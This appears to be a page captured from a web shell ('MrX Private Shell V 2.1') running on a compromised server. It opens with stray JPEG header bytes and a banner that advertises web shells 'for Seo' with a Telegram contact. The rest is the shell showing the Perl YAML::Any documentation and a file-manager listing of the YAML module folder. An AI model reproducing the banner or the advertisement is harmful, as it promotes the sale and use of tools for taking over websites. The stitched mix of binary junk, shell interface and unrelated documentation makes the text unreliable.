����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
=pod
=for comment
DO NOT EDIT. This Pod was generated by Swim v0.1.46.
See http://github.com/ingydotnet/swim-pm#readme
=encoding utf8
=head1 NAME
YAML::Any - Pick a YAML implementation and use it.
=head1 STATUS
WARNING: This module will soon be deprecated. The plan is that YAML.pm itself
will act like an I<Any> module.
=head1 SYNOPSIS
use YAML::Any;
$YAML::Indent = 3;
my $yaml = Dump(@objects);
=head1 DESCRIPTION
There are several YAML implementations that support the Dump/Load API. This
module selects the best one available and uses it.
=head1 ORDER
Currently, YAML::Any will choose the first one of these YAML implementations
that is installed on your system:
=over
=item * YAML::XS
=item * YAML::Syck
=item * YAML::Old
=item * YAML
=item * YAML::Tiny
=back
=head1 OPTIONS
If you specify an option like:
$YAML::Indent = 4;
And YAML::Any is using YAML::XS, it will use the proper variable:
$YAML::XS::Indent.
=head1 SUBROUTINES
Like all the YAML modules that YAML::Any uses, the following subroutines are
exported by default:
=over
=item * Dump
=item * Load
=back
and the following subroutines are exportable by request:
=over
=item * DumpFile
=item * LoadFile
=back
=head1 METHODS
YAML::Any provides the following class methods.
=over
=item C<< YAML::Any->order >>
This method returns a list of the current possible implementations that
YAML::Any will search for.
=item C<< YAML::Any->implementation >>
This method returns the implementation the YAML::Any will use. This result is
obtained by finding the first member of YAML::Any->order that is either
already loaded in C<%INC> or that can be loaded using C<require>. If no
implementation is found, an error will be thrown.
=back
=head1 EXAMPLES
=head2 DumpFile and LoadFile
Here is an example for C<DumpFile>:
#!/usr/bin/perl
use strict;
use warnings;
use YAML::Any qw(DumpFile);
my $ds =
{
array => [5,6,100],
string => "Hello",
};
DumpFile("hello.yml", $ds);
When run, this creates a file called C<hello.yml> in the current working
directory, with the following contents.
---
array:
- 5
- 6
- 100
string: Hello
In turn, the following C<LoadFile> example, loads the contents from there and
accesses them:
#!/usr/bin/perl
use strict;
use warnings;
use YAML::Any qw(LoadFile);
my ($ds) = LoadFile("hello.yml");
print "String == '", $ds->{string}, "'\n";
Assuming C<hello.yml> exists, and is as created by the C<DumpFile> example,
it prints:
$ perl load.pl
String == 'Hello'
$
=head1 AUTHOR
Ingy döt Net <ingy@cpan.org>
=head1 COPYRIGHT
Copyright 2001-2014. Ingy döt Net
This program is free software; you can redistribute it and/or modify it under
the same terms as Perl itself.
See L<http://www.perl.com/perl/misc/Artistic.html>
=cut
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Dumper | Folder | 0755 |
|
|
| Loader | Folder | 0755 |
|
|
| Any.pm | File | 2.6 KB | 0644 |
|
| Any.pod | File | 2.82 KB | 0644 |
|
| Dumper.pm | File | 16.69 KB | 0644 |
|
| Dumper.pod | File | 776 B | 0644 |
|
| Error.pm | File | 5.63 KB | 0644 |
|
| Error.pod | File | 666 B | 0644 |
|
| Loader.pm | File | 26.36 KB | 0644 |
|
| Loader.pod | File | 767 B | 0644 |
|
| Marshall.pm | File | 867 B | 0644 |
|
| Marshall.pod | File | 656 B | 0644 |
|
| Mo.pm | File | 3.24 KB | 0644 |
|
| Node.pm | File | 4.32 KB | 0644 |
|
| Node.pod | File | 2.48 KB | 0644 |
|
| Tag.pm | File | 216 B | 0644 |
|
| Tag.pod | File | 538 B | 0644 |
|
| Types.pm | File | 6.44 KB | 0644 |
|
| Types.pod | File | 738 B | 0644 |
|